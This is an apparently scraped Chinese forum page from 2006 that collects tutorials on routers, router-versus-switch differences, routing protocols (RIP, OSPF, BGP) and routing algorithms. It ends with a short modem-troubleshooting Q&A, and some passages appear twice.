——80年代中期，RIP已不能适应大规模异构网络的互连，0SPF随之产生。它是网间工程任务组织（1ETF）的内部网关协议工作组为IP网络而开发的一种路由协议。

——0SPF是一种基于链路状态的路由协议，需要每个路由器向其同一管理域的所有其它路由器发送链路状态广播信息。在OSPF的链路状态广播中包括所有接口信息、所有的量度和其它一些变量。利用0SPF的路由器首先必须收集有关的链路状态信息，并根据一定的算法计算出到每个节点的最短路径。而基于距离向量的路由协议仅向其邻接路由器发送有关路由更新信息。

——与RIP不同，OSPF将一个自治域再划分为区，相应地即有两种类型的路由选择方式：当源和目的地在同一区时，采用区内路由选择；当源和目的地在不同区时，则采用区间路由选择。这就大大减少了网络开销，并增加了网络的稳定性。当一个区内的路由器出了故障时并不影响自治域内其它区路由器的正常工作，这也给网络的管理、维护带来方便。

3.3 BGP和BGP-4路由协议

——BGP是为TCP／IP互联网设计的外部网关协议，用于多个自治域之间。它既不是基于纯粹的链路状态算法，也不是基于纯粹的距离向量算法。它的主要功能是与其它自治域的BGP交换网络可达信息。各个自治域可以运行不同的内部网关协议。BGP更新信息包括网络号／自治域路径的成对信息。自治域路径包括到达某个特定网络须经过的自治域串，这些更新信息通过TCP传送出去，以保证传输的可靠性。

——为了满足Internet日益扩大的需要，BGP还在不断地发展。在最新的BGp4中，还可以将相似路由合并为一条路由。

3.4 路由表项的优先问题

——在一个路由器中，可同时配置静态路由和一种或多种动态路由。它们各自维护的路由表都提供给转发程序，但这些路由表的表项间可能会发生冲突。这种冲突可通过配置各路由表的优先级来解决。通常静态路由具有默认的最高优先级，当其它路由表表项与它矛盾时，均按静态路由转发。

4 路由算法

——路由算法在路由协议中起着至关重要的作用，采用何种算法往往决定了最终的寻径结果，因此选择路由算法一定要仔细。通常需要综合考虑以下几个设计目标：

——（1）最优化：指路由算法选择最佳路径的能力。

——（2）简洁性：算法设计简洁，利用最少的软件和开销，提供最有效的功能。

——（3）坚固性：路由算法处于非正常或不可预料的环境时，如硬件故障、负载过高或操作失误时，都能正确运行。由于路由器分布在网络联接点上，所以在它们出故障时会产生严重后果。最好的路由器算法通常能经受时间的考验，并在各种网络环境下被证实是可靠的。

——（4）快速收敛：收敛是在最佳路径的判断上所有路由器达到一致的过程。当某个网络事件引起路由可用或不可用时，路由器就发出更新信息。路由更新信息遍及整个网络，引发重新计算最佳路径，最终达到所有路由器一致公认的最佳路径。收敛慢的路由算法会造成路径循环或网络中断。

——（5）灵活性：路由算法可以快速、准确地适应各种网络环境。例如，某个网段发生故障，路由算法要能很快发现故障，并为使用该网段的所有路由选择另一条最佳路径。

——路由算法按照种类可分为以下几种：静态和动态、单路和多路、平等和分级、源路由和透明路由、域内和域间、链路状态和距离向量。前面几种的特点与字面意思基本一致，下面着重介绍链路状态和距离向量算法。

——链路状态算法（也称最短路径算法）发送路由信息到互联网上所有的结点，然而对于每个路由器，仅发送它的路由表中描述了其自身链路状态的那一部分。距离向量算法（也称为Bellman-Ford算法）则要求每个路由器发送其路由表全部或部分信息，但仅发送到邻近结点上。从本质上来说，链路状态算法将少量更新信息发送至网络各处，而距离向量算法发送大量更新信息至邻接路由器。

——由于链路状态算法收敛更快，因此它在一定程度上比距离向量算法更不易产生路由循环。但另一方面，链路状态算法要求比距离向量算法有更强的CPU能力和更多的内存空间，因此链路状态算法将会在实现时显得更昂贵一些。除了这些区别，两种算法在大多数环境下都能很好地运行。

——最后需要指出的是，路由算法使用了许多种不同的度量标准去决定最佳路径。复杂的路由算法可能采用多种度量来选择路由，通过一定的加权运算，将它们合并为单个的复合度量、再填入路由表中，作为寻径的标准。通常所使用的度量有：路径长度、可靠性、时延、带宽、负载、通信成本等。

5 新一代路由器

——由于多媒体等应用在网络中的发展，以及ATM、快速以太网等新技术的不断采用，网络的带宽与速率飞速提高，传统的路由器已不能满足人们对路由器的性能要求。因为传统路由器的分组转发的设计与实现均基于软件，在转发过程中对分组的处理要经过许多环节，转发过程复杂，使得分组转发的速率较慢。另外，由于路由器是网络互连的关键设备，是网络与其它网络进行通信的一个“关口”，对其安全性有很高的要求，因此路由器中各种附加的安全措施增加了CPU的负担，这样就使得路由器成为整个互联网上的“瓶颈”。

——传统的路由器在转发每一个分组时，都要进行一系列的复杂操作，包括路由查找、访问控制表匹配、地址解析、优先级管理以及其它的附加操作。这一系列的操作大大影响了路由器的性能与效率，降低了分组转发速率和转发的吞吐量，增加了CPU的负担。而经过路由器的前后分组间的相关性很大，具有相同目的地址和源地址的分组往往连续到达，这为分组的快速转发提供了实现的可能与依据。新一代路由器，如IP Switch、Tag Switch等，就是采用这一设计思想用硬件来实现快速转发，大大提高了路由器的性能与效率。

——新一代路由器使用转发缓存来简化分组的转发操作。在快速转发过程中，只需对一组具有相同目的地址和源地址的分组的前几个分组进行传统的路由转发处理，并把成功转发的分组的目的地址、源地址和下一网关地址（下一路由器地址）放人转发缓存中。当其后的分组要进行转发时，茵先查看转发缓存，如果该分组的目的地址和源地址与转发缓存中的匹配，则直接根据转发缓存中的下一网关地址进行转发，而无须经过传统的复杂操作，大大减轻了路由器的负担，达到了提高路由器吞吐量的目标。
--------------------------------------------------------------------------------


路由器是什么

《一键清理系统垃圾》

路由器是什么

    是什么把网络相互连接起来？是路由器。路由器是互联网络的枢纽、"交通警察"。目前路由器已经广泛应用于各行各业，各种不同档次的产品已经成为实现各种骨干网内部连接、骨干网间互联和骨干网与互联网互联互通业务的主力军。
    所谓路由就是指通过相互连接的网络把信息从源地点移动到目标地点的活动。一般来说，在路由过程中，信息至少会经过一个或多个中间节点。通常，人们会把路由和交换进行对比，这主要是因为在普通用户看来两者所实现的功能是完全一样的。其实，路由和交换之间的主要区别就是交换发生在OSI参考模型的第二层（数据链路层），而路由发生在第三层，即网络层。这一区别决定了路由和交换在移动信息的过程中需要使用不同的控制信息，所以两者实现各自功能的方式是不同的。
    早在40多年之间就已经出现了对路由技术的讨论，但是直到80年代路由技术才逐渐进入商业化的应用。路由技术之所以在问世之初没有被广泛使用主要是因为80年代之前的网络结构都非常简单，路由技术没有用武之地。直到最近十几年，大规模的互联网络才逐渐流行起来，为路由技术的发展提供了良好的基础和平台。
    路由器是互联网的主要节点设备。路由器通过路由决定数据的转发。转发策略称为路由选择（routing），这也是路由器名称的由来（router，转发者）。作为不同网络之间互相连接的枢纽，路由器系统构成了基于 TCP/IP 的国际互连网络 Internet 的主体脉络，也可以说，路由器构成了 Internet 的骨架。它的处理速度是网络通信的主要瓶颈之一，它的可靠性则直接影响着网络互连的质量。因此，在园区网、地区网、乃至整个 Internet 研究领域中，路由器技术始终处于核心地位，其发展历程和方向，成为整个 Internet 研究的一个缩影。在当前我国网络基础建设和信息建设方兴未艾之际，探讨路由器在互连网络中的作用、地位及其发展方向，对于国内的网络技术研究、网络建设，以及明确网络市场上对于路由器和网络互连的各种似是而非的概念，都具有重要的意义。


路由器与交换机的区别

《一键清理系统垃圾》

路由器与交换机的区别

出处：网络转载

计算机网络往往由许多种不同类型的网络互连连接而成。如果几个计算机网络只是在物理上连接在一起，它们之间并不能进行通信，那么这种“互连”并没有什么实际意义。因此通常在谈到“互连”时，就已经暗示这些相互连接的计算机是可以进行通信的，也就是说，从功能上和逻辑上看，这些计算机网络已经组成了一个大型的计算机网络，或称为互联网络，也可简称为互联网、互连网。

    将网络互相连接起来要使用一些中间设备（或中间系统），ISO的术语称之为中继（relay）系统。根据中继系统所在的层次，可以有以下五种中继系统：

    1.物理层（即常说的第一层、层L1）中继系统，即转发器（repeater）。

    2.数据链路层（即第二层，层L2），即网桥或桥接器（bridge）。

    3.网络层（第三层，层L3）中继系统，即路由器（router）。

    4.网桥和路由器的混合物桥路器（brouter）兼有网桥和路由器的功能。

    5.在网络层以上的中继系统，即网关（gateway）.

    当中继系统是转发器时，一般不称之为网络互联，因为这仅仅是把一个网络扩大了，而这仍然是一个网络。高层网关由于比较复杂，目前使用得较少。因此一般讨论网络互连时都是指用交换机和路由器进行互联的网络。本文主要阐述交换机和路由器及其区别。

     交换机和路由器

    “交换”是今天网络里出现频率最高的一个词，从桥接到路由到ATM直至电话系统，无论何种场合都可将其套用，搞不清到底什么才是真正的交换。其实交换一词最早出现于电话系统，特指实现两个不同电话机之间话音信号的交换，完成该工作的设备就是电话交换机。所以从本意上来讲，交换只是一种技术概念，即完成信号由设备入口到出口的转发。因此，只要是和符合该定义的所有设备都可被称为交换设备。由此可见，“交换”是一个涵义广泛的词语，当它被用来描述数据网络第二层的设备时，实际指的是一个桥接设备；而当它被用来描述数据网络第三层的设备时，又指的是一个路由设备。

    我们经常说到的以太网交换机实际是一个基于网桥技术的多端口第二层网络设备，它为数据帧从一个端口到另一个任意端口的转发提供了低时延、低开销的通路。

    由此可见，交换机内部核心处应该有一个交换矩阵，为任意两端口间的通信提供通路，或是一个快速交换总线，以使由任意端口接收的数据帧从其他端口送出。在实际设备中，交换矩阵的功能往往由专门的芯片（ASIC）完成。另外，以太网交换机在设计思想上有一个重要的假设，即交换核心的速度非常之快，以致通常的大流量数据不会使其产生拥塞，换句话说，交换的能力相对于所传信息量而无穷大（与此相反，ATM交换机在设计上的思路是，认为交换的能力相对所传信息量而言有限）。

    虽然以太网第二层交换机是基于多端口网桥发展而来，但毕竟交换有其更丰富的特性，使之不但是获得更多带宽的最好途径，而且还使网络更易管理。

    而路由器是OSI协议模型的网络层中的分组交换设备（或网络层中继设备），路由器的基本功能是把数据（IP报文）传送到正确的网络，包括：

    1.IP数据报的转发，包括数据报的寻径和传送；

    2.子网隔离，抑制广播风暴；

    3.维护路由表，并与其他路由器交换路由信息，这是IP报文转发的基础。

    4.IP数据报的差错处理及简单的拥塞控制；

    5.实现对IP数据报的过滤和记帐。

    对于不同地规模的网络，路由器的作用的侧重点有所不同。

    在主干网上，路由器的主要作用是路由选择。主干网上的路由器，必须知道到达所有下层网络的路径。这需要维护庞大的路由表，并对连接状态的变化作出尽可能迅速的反应。路由器的故障将会导致严重的信息传输问题。

    在地区网中，路由器的主要作用是网络连接和路由选择，即连接下层各个基层网络单位－－园区网，同时负责下层网络之间的数据转发。

    在园区网内部，路由器的主要作用是分隔子网。早期的互连网基层单位是局域网（LAN），其中所有主机处于同一逻辑网络中。随着网络规模的不断扩大，局域网演变成以高速主干和路由器连接的多个子网所组成的园区网。在其中，处个子网在逻辑上独立，而路由器就是唯一能够分隔它们的设备，它负责子网间的报文转发和广播隔离，在边界上的路由器则负责与上层网络的连接。

     第二层交换机和路由器的区别

    传统交换机从网桥发展而来，属于OSI第二层即数据链路层设备。它根据MAC地址寻址，通过站表选择路由，站表的建立和维护由交换机自动进行。路由器属于OSI第三层即网络层设备，它根据IP地址进行寻址，通过路由表路由协议产生。交换机最大的好处是快速，由于交换机只须识别帧中MAC地址，直接根据MAC地址产生选择转发端口算法简单，便于ASIC实现，因此转发速度极高。但交换机的工作机制也带来一些问题。

    1.回路：根据交换机地址学习和站表建立算法，交换机之间不允许存在回路。一旦存在回路，必须启动生成树算法，阻塞掉产生回路的端口。而路由器的路由协议没有这个问题，路由器之间可以有多条通路来平衡负载，提高可靠性。

    2.负载集中：交换机之间只能有一条通路，使得信息集中在一条通信链路上，不能进行动态分配，以平衡负载。而路由器的路由协议算法可以避免这一点，OSPF路由协议算法不但能产生多条路由，而且能为不同的网络应用选择各自不同的最佳路由。

    3.广播控制：交换机只能缩小冲突域，而不能缩小广播域。整个交换式网络就是一个大的广播域，广播报文散到整个交换式网络。而路由器可以隔离广播域，广播报文不能通过路由器继续进行广播。

    4.子网划分：交换机只能识别MAC地址。MAC地址是物理地址，而且采用平坦的地址结构，因此不能根据MAC地址来划分子网。而路由器识别IP地址，IP地址由网络管理员分配，是逻辑地址且IP地址具有层次结构，被划分成网络号和主机号，可以非常方便地用于划分子网，路由器的主要功能就是用于连接不同的网络。

    5.保密问题：虽说交换机也可以根据帧的源MAC地址、目的MAC地址和其他帧中内容对帧实施过滤，但路由器根据报文的源IP地址、目的IP地址、TCP端口地址等内容对报文实施过滤，更加直观方便。

    6.介质相关：交换机作为桥接设备也能完成不同链路层和物理层之间的转换，但这种转换过程比较复杂，不适合ASIC实现，势必降低交换机的转发速度。因此目前交换机主要完成相同或相似物理介质和链路协议的网络互连，而不会用来在物理介质和链路层协议相差甚元的网络之间进行互连。而路由器则不同，它主要用于不同网络之间互连，因此能连接不同物理介质、链路层协议和网络层协议的网络。路由器在功能上虽然占据了优势，但价格昂贵，报文转发速度低。

    近几年，交换机为提高性能做了许多改进，其中最突出的改进是虚拟网络和三层交换。

    划分子网可以缩小广播域，减少广播风暴对网络的影响。路由器每一接口连接一个子网，广播报文不能经过路由器广播出去，连接在路由器不同接口的子网属于不同子网，子网范围由路由器物理划分。对交换机而言，每一个端口对应一个网段，由于子网由若干网段构成，通过对交换机端口的组合，可以逻辑划分子网。广播报文只能在子网内广播，不能扩散到别的子网内，通过合理划分逻辑子网，达到控制广播的目的。由于逻辑子网由交换机端口任意组合，没有物理上的相关性，因此称为虚拟子网，或叫虚拟网。虚拟网技术不用路由器就解决了广播报文的隔离问题，且虚拟网内网段与其物理位置无关，即相邻网段可以属于不同虚拟网，而相隔甚远的两个网段可能属于不同虚拟网，而相隔甚远的两个网段可能属于同一个虚拟网。不同虚拟网内的终端之间不能相互通信，增强了对网络内数据的访问控制。

    交换机和路由器是性能和功能的矛盾体，交换机交换速度快，但控制功能弱，路由器控制性能强，但报文转发速度慢。解决这个矛盾的技术是三层交换，既有交换机线速转发报文能力，又有路由器良好的控制功能。

    第三层交换机和路由器的区别

    在第三层交换技术出现之前，几乎没有必要将路由功能器件和路由器区别开来，他们完全是相同的：提供路由功能正在路由器的工作，然而，现在第三层交换机完全能够执行传统路由器的大多数功能。作为网络互连的设备，第三层交换机具有以下特征：

    1.转发基于第三层地址的业务流；

    2.完全交换功能；

    3.可以完成特殊服务，如报文过滤或认证；

    4.执行或不执行路由处理。

    第三层交换机与传统路由器相比有如下优点：

    1.子网间传输带宽可任意分配：传统路由器每个接口连接一个子网，子网通过路由器进行传输的速率被接口的带宽所限制。而三层交换机则不同，它可以把多个端口定义成一个虚拟网，把多个端口组成的虚拟网作为虚拟网接口，该虚拟网内信息可通过组成虚拟网的端口送给三层交换机，由于端口数可任意指定，子网间传输带宽没有限制。

    2.合理配置信息资源：由于访问子网内资源速率和访问全局网中资源速率没有区别，子网设置单独服务器的意义不大，通过在全局网中设置服务器群不仅节省费用，更可以合理配置信息资源。

    3.降低成本：通常的网络设计用交换机构成子网，用路由器进行子网间互连。目前采用三层交换机进行网络设计，既可以进行任意虚拟子网划分，又可以通过交换机三层路由功能完成子网间通信，为此节省了价格昂贵的路由器。

    4.交换机之间连接灵活：作为交换机，它们之间不允许存在回路，作为路由器，又可有多条通路来提高可靠性、平衡负载。三层交换机用生成树算法阻塞造成回路的端口，但进行路由选择时，依然把阻塞掉的通路作为可选路径参与路由选择。

    5 结论

    综上所述，交换机一般用于LAN－WAN的连接，交换机归于网桥，是数据链路层的设备，有些交换机也可实现第三层的交换。路由器用于WAN－WAN之间的连接，可以解决异性网络之间转发分组，作用于网络层。他们只是从一条线路上接受输入分组，然后向另一条线路转发。这两条线路可能分属于不同的网络，并采用不同协议。相比较而言，路由器的功能较交换机要强大，但速度相对也慢


路由器原理和路由协议、算法详解

《一键清理系统垃圾》

路由器原理和路由协议、算法详解

近十年来，随着计算机网络规模的不断扩大，大型互联网络(如Internet)的迅猛发展，路由技术在网络技术中已逐渐成为关键部分，路由器也随之成为最重要的网络设备。用户的需求推动着路由技术的发展和路由器的普及，人们已经不满足于仅在本地网络上共享信息，而希望最大限度地利用全球各个地区、各种类型的网络资源。

    而在目前的情况下，任何一个有一定规模的计算机网络(如企业网、校园网、智能大厦等)，无论采用的是快速以大网技术、FDDI技术，还是ATM技术，都离不开路由器，否则就无法正常运作和管理。

    1、网络互连

    把自己的网络同其它的网络互连起来，从网络中获取更多的信息和向网络发布自己的消息，是网络互连的最主要的动力。网络的互连有多种方式，其中使用最多的是网桥互连和路由器互连。

    1.1 网桥互连的网络

    网桥工作在OSI模型中的第二层，即链路层。完成数据帧(frame)的转发，主要目的是在连接的网络间提供透明的通信。网桥的转发是依据数据帧中的源地址和目的地址来判断一个帧是否应转发和转发到哪个端口。帧中的地址称为“MAC”地址或“硬件”地址，一般就是网卡所带的地址。

    网桥的作用是把两个或多个网络互连起来，提供透明的通信。网络上的设备看不到网桥的存在，设备之间的通信就如同在一个网上一样方便。由于网桥是在数据帧上进行转发的，因此只能连接相同或相似的网络(相同或相似结构的数据帧)，如以太网之间、以太网与令牌环(token ring)之间的互连，对于不同类型的网络(数据帧结构不同)，如以太网与X.25之间，网桥就无能为力了。

    网桥扩大了网络的规模，提高了网络的性能，给网络应用带来了方便，在以前的网络中，网桥的应用较为广泛。但网桥互连也带来了不少问题:一个是广播风暴，网桥不阻挡网络中广播消息，当网络的规模较大时(几个网桥，多个以太网段)，有可能引起广播风暴(broadcasting storm)，导致整个网络全被广播信息充满，直至完全瘫痪。第二个问题是，当与外部网络互连时，网桥会把内部和外部网络合二为一，成为一个网，双方都自动向对方完全开放自己的网络资源。这种互连方式在与外部网络互连时显然是难以接受的。问题的主要根源是网桥只是最大限度地把网络沟通，而不管传送的信息是什么。

    1.2 路由器互连网络

    路由器互连与网络的协议有关，我们讨论限于TCP/IP网络的情况。

    路由器工作在OSI模型中的第三层，即网络层。路由器利用网络层定义的“逻辑”上的网络地址(即IP地址)来区别不同的网络，实现网络的互连和隔离，保持各个网络的独立性。路由器不转发广播消息，而把广播消息限制在各自的网络内部。发送到其他网络的数据茵先被送到路由器，再由路由器转发出去。

    IP路由器只转发IP分组，把其余的部分挡在网内(包括广播)，从而保持各个网络具有相对的独立性，这样可以组成具有许多网络(子网)互连的大型的网络。由于是在网络层的互连，路由器可方便地连接不同类型的网络，只要网络层运行的是IP协议，通过路由器就可互连起来。

    网络中的设备用它们的网络地址(TCP/IP网络中为IP地址)互相通信。IP地址是与硬件地址无关的“逻辑”地址。路由器只根据IP地址来转发数据。IP地址的结构有两部分，一部分定义网络号，另一部分定义网络内的主机号。目前，在Internet网络中采用子网掩码来确定IP地址中网络地址和主机地址。子网掩码与IP地址一样也是32bit，并且两者是一一对应的，并规定，子网掩码中数字为“1”所对应的IP地址中的部分为网络号，为“0”所对应的则为主机号。网络号和主机号合起来，才构成一个完整的IP地址。同一个网络中的主机IP地址，其网络号必须是相同的，这个网络称为IP子网。

    通信只能在具有相同网络号的IP地址之间进行，要与其它IP子网的主机进行通信，则必须经过同一网络上的某个路由器或网关(gateway)出去。不同网络号的IP地址不能直接通信，即使它们接在一起，也不能通信。

    路由器有多个端口，用于连接多个IP子网。每个端口的IP地址的网络号要求与所连接的IP子网的网络号相同。不同的端口为不同的网络号，对应不同的IP子网，这样才能使各子网中的主机通过自己子网的IP地址把要求出去的IP分组送到路由器上。

    2 、路由原理

    当IP子网中的一台主机发送IP分组给同一IP子网的另一台主机时，它将直接把IP分组送到网络上，对方就能收到。而要送给不同IP于网上的主机时，它要选择一个能到达目的子网上的路由器，把IP分组送给该路由器，由路由器负责把IP分组送到目的地。如果没有找到这样的路由器，主机就把IP分组送给一个称为“缺省网关(default gateway)”的路由器上。“缺省网关”是每台主机上的一个配置参数，它是接在同一个网络上的某个路由器端口的IP地址。

    路由器转发IP分组时，只根据IP分组目的IP地址的网络号部分，选择合适的端口，把IP分组送出去。同主机一样，路由器也要判定端口所接的是否是目的子网，如果是，就直接把分组通过端口送到网络上，否则，也要选择下一个路由器来传送分组。路由器也有它的缺省网关，用来传送不知道往哪儿送的IP分组。这样，通过路由器把知道如何传送的IP分组正确转发出去，不知道的IP分组送给“缺省网关”路由器，这样一级级地传送，IP分组最终将送到目的地，送不到目的地的IP分组则被网络丢弃了。

    目前TCP/IP网络，全部是通过路由器互连起来的，Internet就是成千上万个IP子网通过路由器互连起来的国际性网络。这种网络称为以路由器为基础的网络(router based network)，形成了以路由器为节点的“网间网”。在“网间网”中，路由器不仅负责对IP分组的转发，还要负责与别的路由器进行联络，共同确定“网间网”的路由选择和维护路由表。

    路由动作包括两项基本内容:寻径和转发。寻径即判定到达目的地的最佳路径，由路由选择算法来实现。由于涉及到不同的路由选择协议和路由选择算法，要相对复杂一些。为了判定最佳路径，路由选择算法必须启动并维护包含路由信息的路由表，其中路由信息依赖于所用的路由选择算法而不尽相同。路由选择算法将收集到的不同信息填入路由表中，根据路由表可将目的网络与下一站(nexthop)的关系告诉路由器。路由器间互通信息进行路由更新，更新维护路由表使之正确反映网络的拓扑变化，并由路由器根据量度来决定最佳路径。这就是路由选择协议(routing protocol)，例如路由信息协议(RIP)、开放式最短路径优先协议(OSPF)和边界网关协议(BGP)等。

    转发即沿寻径好的最佳路径传送信息分组。路由器首先在路由表中查找，判明是否知道如何将分组发送到下一个站点(路由器或主机)，如果路由器不知道如何发送分组，通常将该分组丢弃;否则就根据路由表的相应表项将分组发送到下一个站点，如果目的网络直接与路由器相连，路由器就把分组直接送到相应的端口上。这就是路由转发协议(routed protocol)。

    路由转发协议和路由选择协议是相互配合又相互独立的概念，前者使用后者维护的路由表，同时后者要利用前者提供的功能来发布路由协议数据分组。下文中提到的路由协议，除非特别说明，都是指路由选择协议，这也是普遍的习惯。

    3、 路由协议

    典型的路由选择方式有两种:静态路由和动态路由。

    静态路由是在路由器中设置的固定的路由表。除非网络管理员干预，否则静态路由不会发生变化。由于静态路由不能对网络的改变作出反映，一般用于网络规模不大、拓扑结构固定的网络中。静态路由的优点是简单、高效、可靠。在所有的路由中，静态路由优先级最高。当动态路由与静态路由发生冲突时，以静态路由为准。

    动态路由是网络中的路由器之间相互通信，传递路由信息，利用收到的路由信息更新路由器表的过程。它能实时地适应网络结构的变化。如果路由更新信息表明发生了网络变化，路由选择软件就会重新计算路由，并发出新的路由更新信息。这些信息通过各个网络，引起各路由器重新启动其路由算法，并更新各自的路由表以动态地反映网络拓扑变化。动态路由适用于网络规模大、网络拓扑复杂的网络。当然，各种动态路由协议会不同程度地占用网络带宽和CPU资源。

    静态路由和动态路由有各自的特点和适用范围，因此在网络中动态路由通常作为静态路由的补充。当一个分组在路由器中进行寻径时，路由器首先查找静态路由，如果查到则根据相应的静态路由转发分组;否则再查找动态路由。

    根据是否在一个自治域内部使用，动态路由协议分为内部网关协议(IGP)和外部网关协议(EGP)。这里的自治域指一个具有统一管理机构、统一路由策略的网络。自治域内部采用的路由选择协议称为内部网关协议，常用的有RIP、OSPF;外部网关协议主要用于多个自治域之间的路由选择，常用的是BGP和BGP-4。下面分别进行简要介绍。

    3.1 RIP路由协议

    RIP协议最初是为Xerox网络系统的Xerox parc通用协议而设计的，是Internet中常用的路由协议。RIP采用距离向量算法，即路由器根据距离选择路由，所以也称为距离向量协议。路由器收集所有可到达目的地的不同路径，并且保存有关到达每个目的地的最少站点数的路径信息，除到达目的地的最佳路径外，任何其它信息均予以丢弃。同时路由器也把所收集的路由信息用RIP协议通知相邻的其它路由器。这样，正确的路由信息逐渐扩散到了全网。

    RIP使用非常广泛，它简单、可靠，便于配置。但是RIP只适用于小型的同构网络，因为它允许的最大站点数为15，任何超过15个站点的目的地均被标记为不可达。而且RIP每隔30s一次的路由信息广播也是造成网络的广播风暴的重要原因之一。

    3.2 OSPF路由协议

    80年代中期，RIP已不能适应大规模异构网络的互连，0SPF随之产生。它是网间工程任务组织(1ETF)的内部网关协议工作组为IP网络而开发的一种路由协议。

    0SPF是一种基于链路状态的路由协议，需要每个路由器向其同一管理域的所有其它路由器发送链路状态广播信息。在OSPF的链路状态广播中包括所有接口信息、所有的量度和其它一些变量。利用0SPF的路由器首先必须收集有关的链路状态信息，并根据一定的算法计算出到每个节点的最短路径。而基于距离向量的路由协议仅向其邻接路由器发送有关路由更新信息。

    与RIP不同，OSPF将一个自治域再划分为区，相应地即有两种类型的路由选择方式:当源和目的地在同一区时，采用区内路由选择;当源和目的地在不同区时，则采用区间路由选择。这就大大减少了网络开销，并增加了网络的稳定性。当一个区内的路由器出了故障时并不影响自治域内其它区路由器的正常工作，这也给网络的管理、维护带来方便。

    3.3 BGP和BGP-4路由协议

    BGP是为TCP/IP互联网设计的外部网关协议，用于多个自治域之间。它既不是基于纯粹的链路状态算法，也不是基于纯粹的距离向量算法。它的主要功能是与其它自治域的BGP交换网络可达信息。各个自治域可以运行不同的内部网关协议。BGP更新信息包括网络号/自治域路径的成对信息。自治域路径包括到达某个特定网络须经过的自治域串，这些更新信息通过TCP传送出去，以保证传输的可靠性。

    为了满足Internet日益扩大的需要，BGP还在不断地发展。在最新的BGp4中，还可以将相似路由合并为一条路由。

    3.4 路由表项的优先问题

    在一个路由器中，可同时配置静态路由和一种或多种动态路由。它们各自维护的路由表都提供给转发程序，但这些路由表的表项间可能会发生冲突。这种冲突可通过配置各路由表的优先级来解决。通常静态路由具有默认的最高优先级，当其它路由表表项与它矛盾时，均按静态路由转发。

[ 本帖最后由 mfq 于 2006-6-25 14:31 编辑 ]
--------------------------------------------------------------------------------
作者: avl169254　　时间: 2006-6-25 09:00

4、 路由算法

    路由算法在路由协议中起着至关重要的作用，采用何种算法往往决定了最终的寻径结果，因此选择路由算法一定要仔细。通常需要综合考虑以下几个设计目标:

    ——(1)最优化:指路由算法选择最佳路径的能力。

    ——(2)简洁性:算法设计简洁，利用最少的软件和开销，提供最有效的功能。

    ——(3)坚固性:路由算法处于非正常或不可预料的环境时，如硬件故障、负载过高或操作失误时，都能正确运行。由于路由器分布在网络联接点上，所以在它们出故障时会产生严重后果。最好的路由器算法通常能经受时间的考验，并在各种网络环境下被证实是可靠的。

    ——(4)快速收敛:收敛是在最佳路径的判断上所有路由器达到一致的过程。当某个网络事件引起路由可用或不可用时，路由器就发出更新信息。路由更新信息遍及整个网络，引发重新计算最佳路径，最终达到所有路由器一致公认的最佳路径。收敛慢的路由算法会造成路径循环或网络中断。

    ——(5)灵活性:路由算法可以快速、准确地适应各种网络环境。例如，某个网段发生故障，路由算法要能很快发现故障，并为使用该网段的所有路由选择另一条最佳路径。

    路由算法按照种类可分为以下几种:静态和动态、单路和多路、平等和分级、源路由和透明路由、域内和域间、链路状态和距离向量。前面几种的特点与字面意思基本一致，下面着重介绍链路状态和距离向量算法。

    链路状态算法(也称最短路径算法)发送路由信息到互联网上所有的结点，然而对于每个路由器，仅发送它的路由表中描述了其自身链路状态的那一部分。距离向量算法(也称为Bellman-Ford算法)则要求每个路由器发送其路由表全部或部分信息，但仅发送到邻近结点上。从本质上来说，链路状态算法将少量更新信息发送至网络各处，而距离向量算法发送大量更新信息至邻接路由器。

    由于链路状态算法收敛更快，因此它在一定程度上比距离向量算法更不易产生路由循环。但另一方面，链路状态算法要求比距离向量算法有更强的CPU能力和更多的内存空间，因此链路状态算法将会在实现时显得更昂贵一些。除了这些区别，两种算法在大多数环境下都能很好地运行。

    最后需要指出的是，路由算法使用了许多种不同的度量标准去决定最佳路径。复杂的路由算法可能采用多种度量来选择路由，通过一定的加权运算，将它们合并为单个的复合度量、再填入路由表中，作为寻径的标准。通常所使用的度量有:路径长度、可靠性、时延、带宽、负载、通信成本等。

    5、 新一代路由器

    由于多媒体等应用在网络中的发展，以及ATM、快速以太网等新技术的不断采用，网络的带宽与速率飞速提高，传统的路由器已不能满足人们对路由器的性能要求。因为传统路由器的分组转发的设计与实现均基于软件，在转发过程中对分组的处理要经过许多环节，转发过程复杂，使得分组转发的速率较慢。另外，由于路由器是网络互连的关键设备，是网络与其它网络进行通信的一个“关口”，对其安全性有很高的要求，因此路由器中各种附加的安全措施增加了CPU的负担，这样就使得路由器成为整个互联网上的“瓶颈”。

    传统的路由器在转发每一个分组时，都要进行一系列的复杂操作，包括路由查找、访问控制表匹配、地址解析、优先级管理以及其它的附加操作。这一系列的操作大大影响了路由器的性能与效率，降低了分组转发速率和转发的吞吐量，增加了CPU的负担。而经过路由器的前后分组间的相关性很大，具有相同目的地址和源地址的分组往往连续到达，这为分组的快速转发提供了实现的可能与依据。新一代路由器，如IP Switch、Tag Switch等，就是采用这一设计思想用硬件来实现快速转发，大大提高了路由器的性能与效率。

    新一代路由器使用转发缓存来简化分组的转发操作。在快速转发过程中，只需对一组具有相同目的地址和源地址的分组的前几个分组进行传统的路由转发处理，并把成功转发的分组的目的地址、源地址和下一网关地址(下一路由器地址)放人转发缓存中。当其后的分组要进行转发时，茵先查看转发缓存，如果该分组的目的地址和源地址与转发缓存中的匹配，则直接根据转发缓存中的下一网关地址进行转发，而无须经过传统的复杂操作，大大减轻了路由器的负担，达到了提高路由器吞吐量的目标。


猫”病诊断问答

《一键清理系统垃圾》

猫”病诊断问答

    如何判断COM口有故障

    最简单的方法是到【控制面板】→【调制解调器】→【诊断】（图1），选中“猫”所在的COM口，打开“猫”的电源开关（指外置“猫”，内置“猫”就免了），然后单击【详细信息】按钮。随后出现“请稍候”对话框，电脑与“猫”通讯一两分钟后会弹出“详细信息”对话框（图2），若显示的内容与过去相同或无错误信息出现，说明COM口没有故障。

    如何判断外置“猫”的故障

    如果你使用的是外置“猫”，可以根据指示灯给出的信息，准确了解它的工作情况。

    首先按上面介绍的方法操作，打开“猫”的电源开关，此时应有“MR”、“CS”和“RS”三个指示灯亮。其中“MR”灯亮表示“猫”的电源接通，若“MR”灯不亮，可能有两个原因：一是“猫”的电源有故障，如插头接触不良、AC电源适配器无电压输出等，前者可重新插一次试试，后者可将适配器插头拔下，用万用电表测量其直流输出电压，看其是否与适配器上标的相符（一般为9V）；二是“猫”内部可能有硬件故障，如保险丝烧断之类，如果你的“猫”有保修或维修点，最好送去进一步检查。

    “CS”灯亮表示CTS信号启动，准备接收数据。“RS”灯亮表示RTS信号启动，要求传送数据。若“CS”和“RS”灯中有一个不亮，也说明“猫”存在硬件故障，处理方法同上。

